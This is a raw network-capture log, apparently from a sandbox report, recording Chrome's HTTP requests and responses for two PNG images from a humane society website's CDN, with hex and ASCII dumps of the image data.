                                                                                                                                                                                                                                                        Content-Length: 15508
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2024/11/317_logo_proposed_simpler_inverse-768x161.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Thu, 07 Nov 2024 16:13:54 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC745INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 00 00 00 00 a1 08 06 00 00 00 70 29 d8 58 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 20 00 49 44 41 54 78 9c ed dd 7f 98 5c 55 99 e0 f1 ef b9 5d a9 ae 34 4d db 84 26 74 62 a7 e9 84 18 33 31 9b c9 62 cc 46 cc 64 30 03 98 41 06 49 e4 57 03 2a e8 30 8a 8c e3 b0 e8 e3 ba 3c 2c eb c3 b2 3e ac eb 22 c3 28 2a 3a 2a fe a8 10 91 20 22 2a 22 83 c8 20 83 88 59 8c 99 98 8d 49 6f d2 76 62 6f 88 6d a7 69 3a 95 ea 3a fb c7 7b cb 74 92 fa 75 ab ce ad ba b7 fa fd 3c 4f 3f 44 bb ea d6 a9 ea 5b f7 9e f7 9c f7 bc 07 94 52 4a 29 a5 94 52 4a 29 a5 94 52 4a 29 a5 94 52 4a 29 a5 94 52 4a 29 a5 94 52 4a 29 15 07 a6 d1 0d 70 2a bd cf a3 c5 5e 80 99 dc c9 a5 f3 b6 37 ba 39 4a 29 a5 94 52 4a 45 8d d7
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRp)XpHYs+ IDATx\U]4M&tb31bFd0AIW*0<,>"(*:* "*" YIovbomi::{tu<O?D[RJ)RJ)RJ)RJ)RJ)RJ)p*^79J)RJE
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 23 4f 60 ed 79 f4 cf 7b da e1 31 95 52 4a 29 a5 94 8a b4 e8 cf 00 18 9b c2 98 4b 00 d7 3b f9 26 31 e6 46 d2 83 b3 1c 1f 57 29 a5 94 52 4a a9 c8 8a 7e 00 80 9d eb e7 fe b7 3b 3e b0 07 ac c1 b0 81 cd bb 13 8e 8f ad 94 52 4a 29 a5 54 24 45 3f 00 30 5c 0b 2c 0c e9 e8 b3 80 4b 99 48 84 75 7c a5 94 52 4a 29 a5 22 25 da 01 40 7a f0 1c ac fd 9b 10 5f c1 03 ce c6 98 b5 7c 6b 40 67 01 94 52 4a 29 a5 54 d3 8b 6e 00 b0 69 a8 03 c3 8d 40 57 c8 af d4 0e bc 83 4c 62 b1 2c 38 56 4a 29 a5 94 52 aa 79 45 33 00 48 ef 4b 60 ed 45 c0 0a ea d3 c6 55 18 73 39 5e ce 45 89 51 a5 94 52 4a 29 a5 22 2b 9a 01 80 c9 2d c4 da 7e 6a df f4 2b 00 fb 6e 72 b9 c5 f5 7b 3d a5 94 52 4a 29 a5 ea 2f 7a 01 40 7a 5f 02 58 03 9c 03 d4 33 2f 7f 2e c6 bc b7 8e af a7 94 52 4a 29 a5 54 dd 45 2b 00 48
                                                                                                                                                                                                                                                        Data Ascii: #O`y{1RJ)K;&1FW)RJ~;>RJ)T$E?0\,KHu|RJ)"%@z_|k@gRJ)Tni@WLb,8VJ)RyE3HK`EUs9^EQRJ)"+-~j+nr{=RJ)/z@z_X3/.RJ)TE+H
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: ed 5f 47 94 aa 44 02 19 51 0e 5c 16 dc 3f cf de 44 b4 46 6f a3 6c ea f7 f6 1c 64 16 eb 7b d6 da 77 fb 03 7f 2a 7a da 80 1e 60 25 70 19 70 27 f0 23 6b ed 3b fd d4 c9 40 1a 70 61 36 8b c1 7e 00 79 13 71 d2 29 9b 83 cd 98 16 17 17 bf 23 d4 87 8c fe 07 f9 5b ed 04 ee 70 9d ab d6 0c fc 9c dd 0b 91 a9 c8 4b 88 de cc 47 53 f0 03 cf 87 80 67 03 3c 2d 89 a4 d7 f4 85 d1 a6 69 a6 0d 19 0d ff 7b e0 9f 81 b3 ab b9 39 a9 69 6b 01 b0 ac 8a 73 66 29 32 1b e2 6a 4d c4 74 d3 86 a4 93 7d 11 b8 dd 4f 51 55 d1 95 40 66 85 97 23 69 83 ff c9 5a 1b 68 e6 ab be 01 40 7a 30 85 35 e7 23 d1 4b 1c 9d 8b e1 dc 46 37 a2 4e 12 48 84 b9 36 e0 f3 be 6e 8c d9 15 42 7b 62 cd 5a db 09 5c 81 7c 51 57 35 b8 39 d3 c1 7e 64 14 ba ec 62 ca 29 e6 02 37 e8 e8 97 53 8b 90 d9 ae b5 7e 00 ac 54 39 b3
                                                                                                                                                                                                                                                        Data Ascii: _GDQ\?DFold{w*z`%pp'#k;@pa6~yq)#[pKGSg<-i{9iksf)2jMt}OQU@f#iZh@z05#KF7NH6nB{bZ\|QW59~db)7S~T9
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 1f 02 9e a6 f2 8e 7b 8e a3 5f e2 2c 12 39 df 82 9b f2 b2 59 e0 51 64 b7 5e 9d d1 68 3e 13 c0 cf aa 78 5e 17 b0 8c e6 0b 00 4e 60 8c c9 21 33 03 e3 48 70 3d 64 ad dd 02 bc 08 7c 09 38 cb d1 4b 25 91 cf 55 03 00 55 89 d9 c0 1b fc 99 b8 a9 9d c3 55 04 2f 58 d1 f4 8c 31 13 d6 da c7 81 bf 40 ae 5d b5 04 48 e3 04 db 48 b1 56 0f 02 9f 0b e9 35 87 89 c0 6c 86 3f f3 39 e6 ff 0c 03 bb ac b5 cf fa ff fb 16 ea 58 75 29 9c 00 20 3d d8 8e e1 96 d0 8e 1f 3d bd 18 f3 2e be b9 67 0b 97 f6 c6 35 17 7e 35 15 4c 19 1d 27 0b fc a4 da 17 34 c6 1c 24 60 27 c0 1f a5 9c 05 5c 01 dc ea ff bb 96 91 ff 1c 30 80 5c 74 3e 0f 8c e8 5e 06 35 c9 f9 3f f9 a9 e3 fc 88 b2 4b d5 8c 10 65 91 4e fc 30 c1 2a 86 74 01 6f b2 d6 3e ec 77 90 a7 15 63 4c ce 5a fb 22 70 37 f2 1d 71 f5 b7 9c 2e f7 06
                                                                                                                                                                                                                                                        Data Ascii: {_,9YQd^h>x^N`!3Hp=d|8K%UUU/X1@]HHV5l?9Xu) ==.g5~5L'4$`'\0\t>^5?KeN0*to>wcLZ"p7q.
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 6e 02 d9 3a 7d 17 b0 3d c4 a0 60 23 52 56 74 5a 2d 78 b4 d6 2e c5 5d 25 03 90 d1 ff ef 38 5a 6f 32 4e f0 00 00 e0 24 e4 7a 39 6d 02 00 7f 21 e1 6a e0 83 b8 5d cb f1 6f 0e 8f a5 e2 67 36 70 3f d5 7d 97 16 21 41 7c d0 5a e9 7b 90 b4 b3 e9 be 96 a7 98 0c 92 32 92 46 02 80 50 d3 7b a7 09 0f e8 b3 d6 1e df 4f ca ef d8 9c 5f d8 fe 26 a4 18 88 8b f5 8d 20 fb 2b 3d 5f c9 6c b5 9b 00 c0 e0 21 79 d5 71 cb ad 0b 4b 3b 70 39 e9 bd df a7 7f 5e 1c be 48 d5 ce da fc ce 55 03 fc ce c6 45 c0 cd 48 67 c3 d5 68 e3 12 8e 56 8f c8 1f 33 8b 74 02 c7 80 01 6b ed 97 80 47 8d 31 4e ab bc 18 63 e2 32 03 e4 da 06 dc dd 68 73 c8 0e be 4f 38 3a 5e 86 ea 2a d0 b4 d3 5c b5 eb 13 c0 2c 6b ed f1 8b ce 92 1c dd 01 f8 3c 24 4d a3 1b b7 7b 39 3c e5 f0 58 2a 7e 3a 90 ce f8 56 82 a7 09 be 8e
                                                                                                                                                                                                                                                        Data Ascii: n:}=`#RVtZ-x.]%8Zo2N$z9m!j]og6p?}!A|Z{2FP{O_& +=_l!yqK;p9^HUEHghV3tkG1Nc2hsO8:^*\,k<$M{9<X*~:V
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 07 a9 ef fa a3 51 ff f5 6a 5d 13 97 44 d6 69 fc ca 5a fb 80 cb 6a 4d d5 05 00 e9 bd 09 f2 0b 5c 63 a2 d5 33 fc d5 dc 14 6b 4e 3b f6 1a 70 5a ab 47 7f ef 4c 7e f4 bb c3 ec 1c 0b 6d a6 ab 0f 63 ae 44 b6 a1 8e 1c 63 cc a8 b5 76 88 e0 bb 0d ce b6 d6 a6 8c 31 35 6f 08 e6 77 f8 03 6d f4 e4 8f 4a ec b0 d6 7e 0a b9 79 7c 14 77 53 c9 5d c8 7a 00 0d 00 ca f3 80 7e 87 c7 db 86 e3 d1 7f 5f 07 d5 a5 ad 1d 24 e0 b9 a9 fe e8 fb c0 cd c6 98 9d 8d 6e 88 8a 8c fc 22 60 90 e0 fa 17 48 67 c9 55 f1 80 bc 21 60 ab 31 26 e3 0f 16 45 7d 2d 5e 31 23 01 bf 3f 4f 5b 6b 1f 42 76 a2 bf 85 ea 67 ea 13 c0 0a e4 3e 58 af 00 e0 71 a4 f0 43 18 83 05 83 d4 b7 90 c3 30 92 ba f3 37 0e 8e 35 17 c9 f5 df 81 c3 6c 92 ea 02 00 63 da 91 9a ed b1 59 50 f3 9a 93 5b f8 9b 33 4f 22 e9 9d 38 8d bf aa
                                                                                                                                                                                                                                                        Data Ascii: Qj]DiZjM\c3kN;pZGL~mcDcv15owmJ~y|wS]z~_$n"`HgU!`1&E}-^1#?O[kBvg>XqC075lcYP[3O"8
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: f9 5e 64 91 fb 47 2f f0 36 e4 3a ed 72 f4 ff 20 0d dc eb c2 5f 0c fc 55 e4 7d d7 7a 1d cf 10 ee b5 a4 de 12 fe 80 59 39 f9 fb 63 07 32 23 7e 03 32 e8 58 ab 0c f5 9b 19 ba 18 58 e2 6f 42 e6 da 57 80 87 eb 98 ad 90 ff 7b 80 ec 6a ff 30 f0 3e dc f4 53 92 c8 67 b5 d3 5a fb 89 6a 07 ce 2a 0f 00 d2 83 6d 18 de 8e 9b 13 2a 74 27 25 0c 97 f6 cc 64 f5 69 49 82 5c d2 ce 6c 4f f0 ce be 36 7e f1 fb 23 0c bd 12 ca 82 e0 25 d8 dc 0a 32 2d db 69 dc 74 eb 09 fc 8d 52 76 20 6b 01 d6 06 78 6a 37 f0 66 6b ed c3 01 3b 4a 49 24 27 7b 09 52 45 06 e4 26 37 88 04 02 03 c0 3e 24 d7 36 7f 72 27 90 80 63 1e 52 b1 e8 1c c2 9b 8d 1a 63 1a 2f 20 ab 40 37 f0 17 b8 e9 84 8c 21 17 e7 30 3f ef 75 04 6f eb 28 70 5f 08 6d 51 cd 67 2b b2 17 86 ab 41 88 14 72 7d 3b c7 d1 f1 ca 19 42 ce f7 46
                                                                                                                                                                                                                                                        Data Ascii: ^dG/6:r _U}zY9c2#~2XXoBW{j0>SgZj*m*t'%diI\lO6~#%2-itRv kxj7fk;JI$'{RE&7>$6r'cRc/ @7!0?uo(p_mQg+Ar};BF
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: d9 29 b7 3d f5 99 2d 86 bf 9c 93 62 c5 29 a1 54 3f 5d 00 66 35 e9 bd 51 4c 9b 19 07 3e 87 5c 88 2b 95 00 6e b4 d6 c6 22 60 9c 22 87 74 fa 6f 03 1e d1 ce 5f 51 4b 71 b3 b3 64 16 59 63 11 5a ae ae 3f fa 7f 39 c1 d2 7f 86 81 7b b4 f4 a7 aa 96 df 99 fe 02 70 2b 72 3e 45 d1 04 b0 11 f8 40 14 47 77 fd 19 e8 1f 13 2c 88 da 49 f0 b4 55 55 d8 38 b2 ff c9 ed 5a 08 23 3c 7e 3f e3 0e 64 b0 d5 a5 14 f0 21 e0 82 72 a9 40 65 6e e4 66 25 31 28 ef 98 f4 0c 17 cc 69 e5 9c d9 ad 81 36 fd aa d4 bf eb 4c f0 d6 b9 ad b4 bb 5f 0c 90 04 5e 4f b0 4e 4a 5d f8 0b b2 b6 03 9f 26 58 2a d0 22 e0 ca 4a 73 d0 22 20 8b 8c 46 df 04 7c a1 49 77 7d ad 99 b5 36 5f fa d3 45 fa cf f3 c0 f7 c3 5a 58 e6 8f 7c 2c 07 36 50 79 b0 92 45 3a ff 71 ad e4 a2 22 c2 18 93 31 c6 7c 1e b8 11 39 d7 a3 32 c2
                                                                                                                                                                                                                                                        Data Ascii: )=-b)T?]f5QL>\+n"`"to_QKqdYcZ?9{p+r>E@Gw,IUU8Z#<~?d!r@enf%1(i6L_^ONJ]&X*"Js" F|Iw}6_EZX|,6PyE:q"1|92
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 4a 29 a5 54 fc 9d d8 c9 f7 bc 24 f0 a7 f5 6f 4a e5 ce 6c 6f e1 fc ee 20 15 29 dd 3b fb d4 24 7f d6 95 64 86 bb 69 00 0f 72 cb 5d 1d 4c 29 a5 94 52 4a a9 42 4e 0c 00 a4 1e 69 5f dd 5b 52 21 cf c0 95 67 b4 71 c6 49 8d 19 fd cf eb 4c 7a 9c 7b 7a 2b 27 bb db 7d d8 c3 98 9e f2 0f 53 4a 29 a5 94 52 aa 7a 85 d2 7c 12 54 b6 e3 6b 43 74 24 3c fa cf 98 d9 e8 66 00 b0 6e 4e 8a 79 6d ce 32 a5 3c 64 f3 2b a5 94 52 4a 29 a5 42 53 20 05 c8 76 21 1b 2c 45 d2 a5 bd 33 39 bd b5 b1 a3 ff 79 5d ad 1e d7 ce 3f c9 d5 e1 3c 60 01 9b 77 47 76 ed 85 52 4a 29 a5 94 8a bf 13 3b 9b 39 33 b7 01 ed a8 48 aa c5 70 65 6f 34 46 ff f3 d6 cd 49 31 c3 5d 97 bd 83 6c 22 8c ad a0 95 52 4a 29 a5 94 02 0a a6 00 d9 c8 8e fe bf ae 23 c1 99 ed 4e 2b ef d4 6c c1 49 2d bc fe 14 67 7b 02 24 c8 79 6d
                                                                                                                                                                                                                                                        Data Ascii: J)T$oJlo );$dir]L)RJBNi_[R!gqILz{z+'}SJ)Rz|TkCt$<fnNym2<d+RJ)BS v!,E39y]?<`wGvRJ);93Hpeo4FI1]l"RJ)#N+lI-g{$ym
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: cc 2b f1 fb ed c8 df 35 ff 79 b5 23 7f c7 5d c0 73 fe ff d7 41 fc 3f 87 42 72 c0 33 c0 a7 90 bf 75 1b 70 16 c5 d7 49 8c 13 ed ce 3f 48 27 fe ba e3 fe bf 76 e0 22 64 21 78 a1 eb d3 28 f0 00 12 08 bf 10 6a eb 82 19 06 9e 3a ee ff cb cf d8 8c 23 0b fc bb 4b 3c ff 00 75 ae dc 54 e8 c3 cd 82 d9 ce b1 65 b5 1a ee 37 63 59 76 bd 9c e5 0d b3 92 91 2a 07 6a 81 ad 7f c8 32 38 5e f3 4c 54 0e 8f 6d 0e 9a a4 94 52 fb 81 3b 39 71 51 68 7e b4 f9 5a 24 00 28 66 07 d2 d9 88 b3 83 c4 63 84 70 8c a3 b3 11 85 ee c9 73 a7 fc bb a3 c8 63 72 c8 7b 1d 70 dc b6 7a 4b 52 7a 76 e3 09 a4 73 7f 25 f0 26 a4 e2 0d 48 a7 f0 97 c0 f7 29 3f f3 13 57 39 8e dd b7 e2 34 8a 8f fe 1f 44 82 e0 a8 7f 0e 19 8e ed f4 ce 05 3e 8c fc 7d 0b cd 02 0d 20 d7 b5 8d 48 87 3b 4a 9e 45 16 e2 1f 2f 83 bc 97
                                                                                                                                                                                                                                                        Data Ascii: +5y#]sA?Br3upI?H'v"d!x(j:#K<uTe7cYv*j28^LTmR;9qQh~Z$(fcpscr{pzKRzvs%&H)?W94D>} H;JE/


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        87192.168.2.449854192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC651OUTGET /wp-content/uploads/2024/12/Toolbar-icon-with-language-symbol.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 105963
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2024/12/Toolbar-icon-with-language-symbol.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Mon, 16 Dec 2024 17:06:27 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca HIT
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC752INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 e8 00 00 03 e8 08 06 00 00 00 4d a3 d4 e4 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 01 9d 9d 49 44 41 54 78 9c ec dd 75 7c 53 d7 ff c7 f1 d7 4d d2 d4 dd 85 d2 02 c5 1d 82 bb 6d 0c c2 9c 6d 0c 98 31 b6 31 77 df 60 be fd e6 be 31 37 a6 4c 3a 61 82 0d 1d c1 61 b8 5b a1 a5 ee 6d 9a fc fe 48 c7 77 3e e4 26 27 f2 79 3e 1e 79 14 eb b9 6f ac b9 9f 7b ce f9 1c cd e9 74 22 84 10 42 08 21 84 10 42 08 b5 4c aa 03 08 21 84 10 fe 42 b3 58 83 81 18 20 b6 f1 63 0c 10 09 44 e3 7a cf 8d 06 cc 40 38 10 06 04 ff c3 cf 69 8d 9f fb 67 91 fc f5 bd 3b 04 08 6d fc 76 35 50 f3 a7 9f b7 03 e5 7f 33 56 09 e0 04 2a 81 3a a0 b4 f1 d7 96 02 b5 40 d5 3f fc 5c 79 e3 e7 96 00 c5 40 89 d3 96 5b fb 37 e3 0b 21
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRMpHYsIDATxu|SMmm11w`17L:aa[mHw>&'y>yo{t"B!BL!BX cDz@8ig;mv5P3V*:@?\y@[7!
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: e1 a5 9c b8 96 c8 2f 03 6c 8d 1f 57 39 6d b9 d5 4a 53 09 21 84 f0 7a 52 a0 0b 21 84 f8 0b cd 62 6d 09 f4 06 7a 01 3d 71 2d 53 0f 52 1a 4a 08 df 66 c7 b5 8f fd 17 60 29 b0 c4 69 cb dd a2 36 92 10 42 08 6f 23 05 ba 10 42 04 b8 c6 d9 f1 1e b8 0a f2 df 5e 89 4a 43 09 11 18 0a 80 25 b8 0a f6 c5 c0 32 99 65 17 42 88 c0 26 05 ba 10 42 04 18 cd 62 8d 00 fa 00 03 80 81 b8 96 ac 07 2b 0d 25 84 00 a8 c5 b5 24 fe 67 60 3e b0 d8 69 cb ad 50 1b 49 08 21 84 27 49 81 2e 84 10 7e ae b1 99 5b 3f fe 57 90 77 05 4c 2a 33 09 21 8e 8a 1d 57 e3 b9 df 0a f6 85 d2 7c 4e 08 21 fc 9b 14 e8 42 08 e1 67 34 8b 35 0e 57 21 fe db ab 23 d2 59 5d 08 7f e0 c0 75 b4 db cf c0 3c 60 be d3 96 5b a4 34 91 10 42 08 5d 49 81 2e 84 10 3e 4e b3 58 cd b8 9a b9 0d 07 46 e0 3a ee cc a8 34 94 10 c2 13
                                                                                                                                                                                                                                                        Data Ascii: /lW9mJS!zR!bmz=q-SRJf`)i6Bo#B^JC%2eB&Bb+%$g`>iPI!'I.~[?WwL*3!W|N!Bg45W!#Y]u<`[4B]I.>NXF:4
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 26 05 ba 10 42 19 cd 62 8d 07 ae 06 ae 02 e2 15 c7 11 42 08 11 d8 0a 81 e7 81 e7 9d b6 dc c3 aa c3 08 21 02 93 14 e8 42 08 8f d3 2c d6 4c 5c b3 e5 93 90 c6 6f 42 08 21 bc 4b 25 f0 3a f0 84 d3 96 bb 47 75 18 21 44 60 91 02 5d 08 e1 31 9a c5 da 0e d7 fe f2 f3 80 20 c5 71 84 10 42 88 7f 53 0f cc 00 1e 73 da 72 7f 55 1d 46 08 11 18 a4 40 17 42 b8 9d 66 b1 76 07 ee 06 ac 48 47 76 21 84 10 be c5 09 e4 02 0f 38 6d b9 36 d5 61 84 10 fe 4d 0a 74 21 84 db 68 16 6b 1f e0 2e 60 a4 ea 2c 42 08 21 84 0e be c3 55 a8 2f 56 1d 44 08 e1 9f a4 40 17 42 e8 4e b3 58 07 e2 9a 31 1f aa 3a 8b 10 42 08 e1 06 73 80 fb 9c b6 dc f9 aa 83 08 21 fc 8b 14 e8 42 08 dd 68 16 eb 00 60 1a 30 48 71 14 21 84 10 c2 13 e6 01 f7 3a 6d b9 3f ab 0e 22 84 f0 0f 52 a0 0b 21 4e 98 66 b1 f6 c5 55 98
                                                                                                                                                                                                                                                        Data Ascii: &BbB!B,L\oB!K%:Gu!D`]1 qBSsrUF@BfvHGv!8m6aMt!hk.`,B!U/VD@BNX1:Bs!Bh`0Hq!:m?"R!NfU
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 20 42 f8 3b 39 07 5d 08 37 d3 2c d6 b3 80 75 48 71 2e 84 10 42 08 df 34 12 58 db 78 4f 23 84 70 23 99 41 17 c2 4d 34 8b 35 1a 78 0e 98 a0 3a 8b 10 42 5f 06 83 46 58 48 30 21 66 b3 eb 15 1c 84 d9 64 22 24 d8 8c 39 c8 44 70 50 10 21 c1 66 42 cc 41 98 83 82 08 0e 0a 22 34 d8 4c b0 39 e8 c8 cf 07 9b 83 08 31 bb 3e 1a 0d 06 82 cd 41 18 34 03 e6 20 13 46 a3 01 b3 c9 84 c1 e0 fa be c9 68 3c 72 6d a3 c1 40 90 c9 f8 2f e9 5c ea ea ed 38 7e f7 1e ef 74 3a 1b 7f cc 81 c3 e1 a4 a6 ae 8e 86 06 07 75 76 3b 76 7b 03 75 76 3b b5 75 f5 34 38 1c d4 d5 db a9 b7 db a9 ab b7 53 5d 5b 47 55 4d 2d 35 75 75 d4 d4 d6 53 67 af a7 b6 ae 9e ba 7a 3b b5 f5 ae 8f 75 f5 76 6a ea ea a8 ae a9 a3 ba b6 ce f5 ed da 3a e4 1e 43 08 bf f4 2e 70 b5 d3 96 5b aa 3a 88 10 fe 48 0a 74 21 dc 40 b3
                                                                                                                                                                                                                                                        Data Ascii: B;9]7,uHq.B4XxO#p#AM45x:B_FXH0!fd"$9DpP!fBA"4L91>A4 Fh<rm@/\8~t:uv;v{uv;u48S][GUM-5uuSgz;uvj:C.p[:Ht!@
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: b1 47 75 34 21 bc d1 26 e0 6c a7 2d 77 bd ea 20 42 78 2b 29 d0 85 f8 07 9a c5 7a 3e f0 32 b2 a4 5d 08 00 da 64 37 a1 5b eb 16 74 6e 99 4d 8b 26 69 34 4d 4d 24 33 25 91 b8 a8 48 d5 d1 84 f0 1a 05 c5 a5 47 f6 b2 ef d8 7f 90 35 5b 77 b2 72 d3 76 d6 6f df ad 3a 9a 10 de a2 02 b8 dc 69 cb 7d 5f 75 10 21 bc 91 14 e8 42 fc 89 66 b1 06 03 4f 01 57 a8 ce 22 84 4a 99 29 89 f4 68 d7 92 1e ed 5a d2 32 33 fd c8 d1 67 89 b1 d1 aa a3 09 e1 33 0a 4b cb d9 73 d0 d5 21 7e e3 ce bd 2c fb 75 0b 4b d6 6d e2 60 61 b1 ea 68 42 a8 f6 32 70 9d d3 96 5b ab 3a 88 10 de 44 0a 74 21 7e 47 b3 58 b3 81 8f 81 ee aa b3 08 e1 69 46 83 81 7e 9d db d2 af 73 5b 3a b7 6c 46 66 4a 22 4d 92 13 48 4d 88 53 1d 4d 08 bf b1 bf a0 f0 48 c1 be 66 cb 4e 16 af dd c8 a2 35 1b b1 37 34 a8 8e 26 84 0a cb
                                                                                                                                                                                                                                                        Data Ascii: Gu4!&l-w Bx+)z>2]d7[tnM&i4MM$3%HG5[wrvo:i}_u!BfOW"J)hZ23g3Ks!~,uKm`ahB2p[:Dt!~GXiF~s[:lFfJ"MHMSMHfN574&
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: ac 0b 6f f3 06 ae 2e ef 75 aa 83 08 71 22 a4 40 17 3e 4d b3 58 63 81 4f 81 21 aa b3 08 e1 0b cc 41 26 2e 1c 3d 8c 67 6f 9a 4c b0 39 48 75 1c 21 84 8f 71 38 9c 7c bf 74 25 cf 7c f8 15 8b d6 6c a0 a6 b6 1e 7b 43 83 ea 58 42 fc 66 3e 70 ba d3 96 5b ac 3a 88 10 c7 4b 0a 74 e1 b3 34 8b b5 39 f0 35 d0 5a 75 16 21 7c cd 88 5e 5d 78 ef be 1b 49 8c 8d 56 1d 45 08 e1 a3 76 ec 3f c8 6b 5f fc c0 7b df cd a5 a0 b8 8c da fa 7a 99 55 17 de 60 13 30 da 69 cb dd ae 3a 88 10 c7 43 0a 74 e1 93 34 8b b5 0f f0 25 90 a0 3a 8b 10 be aa 4b ab 66 bc 7b df 8d b4 c9 6a 82 c1 a0 a9 8e 23 84 f0 51 0e 87 93 19 3f cc e7 d9 0f 73 d9 b8 73 2f 55 35 b5 34 38 1c aa 63 89 c0 76 18 d7 4c fa 42 d5 41 84 38 56 52 a0 0b 9f a3 59 ac e7 00 6f 01 21 8a a3 08 e1 f3 9a a6 26 31 fd ce ab 19 dc bd 03
                                                                                                                                                                                                                                                        Data Ascii: o.uq"@>MXcO!A&.=goL9Hu!q8|t%|l{CXBf>p[:Kt495Zu!|^]xIVEv?k_{zU`0i:Ct4%:Kf{j#Q?ss/U548cvLBA8VRYo!&1
